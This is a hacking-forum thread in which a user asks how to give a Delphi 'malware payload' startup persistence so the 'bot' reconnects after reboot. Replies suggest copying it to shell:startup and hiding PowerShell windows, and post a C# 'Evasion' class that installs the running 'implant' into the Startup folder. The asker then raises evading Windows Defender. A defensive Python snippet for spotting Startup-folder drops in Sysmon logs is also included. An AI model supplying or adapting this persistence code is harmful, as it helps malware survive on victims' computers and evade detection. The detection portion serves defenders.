Add startup to an EXE payload?

Evild34d

Hi,

I have a malware payload which is coded in Delphi, without startup. I need your help to add startup to the payload (exe); any code/method that works, please! Only adding startup is enough.

Thanks for any help
 
proxy said:
copy the exe file to the 'shell:startup' folder


So using this method, the startup feature will connect the bot again when the user's PC restarts? Thanks
 
Evild34d said:
So using this method, the startup feature will connect the bot again when the user's PC restarts? Thanks

-WindowStyle Hidden

https:// www(dot)hanselman(dot)com /blog/running-powershell-scripts-from-the-command-line-in-a-hidden-window

https:// www(dot)codeproject(dot)com /Questions/884878/how-to-start-the-windows-application-when-the-star

reaction is appreciated
 
C#:
using System;
using System.IO;
using System.Reflection;

namespace WireTap.Evasion
{
internal sealed class Startup
{

/// <summary>
/// Current executable location
/// </summary>
private static readonly FileInfo CurrentExecutable = new FileInfo(Assembly.GetExecutingAssembly().Location);

/// <summary>
/// Shell startup directory path
/// Any file in this dir will be executed after user logged in.
/// </summary>
private static readonly DirectoryInfo ShellStartupDirectory = new DirectoryInfo(Environment.GetFolderPath(Environment.SpecialFolder.Startup));


/// <summary>
/// Installs the application by copying the current executable to the Shell Startup directory.
/// </summary>
public static string Install()
{
FileInfo ImplantShellStartupExecutable = new FileInfo(Path.Combine(ShellStartupDirectory.FullName, CurrentExecutable.Name));

// Create startup dir if not exists
if (!ShellStartupDirectory.Exists)
{
ShellStartupDirectory.Create();
}

// If the executable does not already exist in the Shell Startup directory, copy it there.
if (!ImplantShellStartupExecutable.Exists)
{
CurrentExecutable.CopyTo(ImplantShellStartupExecutable.FullName);
#if DEBUG
Console.WriteLine("Implant installed");
#endif
return ImplantShellStartupExecutable.FullName;
}
return null;
}
}
}
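
From the defender's side, the Startup-folder copy discussed in this thread shows up as a file-creation event. The Python below is an added example, not part of any post in the thread: it assumes Sysmon Event ID 11 (FileCreate) records exported as JSON lines, and the sample events and the `startup_drops` helper are constructed for illustration.

```python
import json
import ntpath
import re

# Per-user and all-users Startup folders (what shell:startup and shell:common startup resolve to).
STARTUP_RE = re.compile(
    r"\\(?:users\\[^\\]+\\appdata\\roaming|programdata)"
    r"\\microsoft\\windows\\start menu\\programs\\startup\\[^\\]+$",
    re.IGNORECASE,
)
# File types that run at logon when placed there; .lnk is included because a shortcut can launch anything.
RISKY_EXT = {".exe", ".scr", ".com", ".bat", ".cmd", ".ps1", ".vbs", ".js", ".hta", ".lnk"}

# Constructed sample records shaped like Sysmon Event ID 11 (FileCreate), one JSON object per line.
SAMPLE_EVENTS = r"""
{"EventID": 11, "Image": "C:\\Users\\alice\\Downloads\\invoice.exe", "TargetFilename": "C:\\Users\\alice\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\invoice.exe"}
{"EventID": 11, "Image": "C:\\Windows\\explorer.exe", "TargetFilename": "C:\\Users\\alice\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\desktop.ini"}
{"EventID": 11, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "TargetFilename": "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\update.lnk"}
{"EventID": 1, "Image": "C:\\Windows\\System32\\cmd.exe"}
{"EventID": 11, "Image": "C:\\Users\\alice\\Downloads\\setup.exe", "TargetFilename": "C:\\Program Files\\App\\app.exe"}
"""

def startup_drops(lines):
    """Return findings for FileCreate events that place a runnable file in a Startup folder."""
    findings = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        ev = json.loads(line)
        if ev.get("EventID") != 11:          # only FileCreate events are relevant here
            continue
        target = ev.get("TargetFilename", "")
        image = ev.get("Image", "")
        ext = ntpath.splitext(target)[1].lower()
        if not STARTUP_RE.search(target) or ext not in RISKY_EXT:
            continue
        # A process writing a file with its own name into Startup is the self-copy
        # pattern of the Install() routine quoted in the thread.
        self_copy = ntpath.basename(image).lower() == ntpath.basename(target).lower()
        findings.append({"target": target, "image": image, "self_copy": self_copy})
    return findings

if __name__ == "__main__":
    for f in startup_drops(SAMPLE_EVENTS.splitlines()):
        tag = "SELF-COPY" if f["self_copy"] else "drop"
        print(f"[{tag}] {f['image']} -> {f['target']}")
```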
 
EternityTeam said:

Thanks but this will not cause WD detection!
 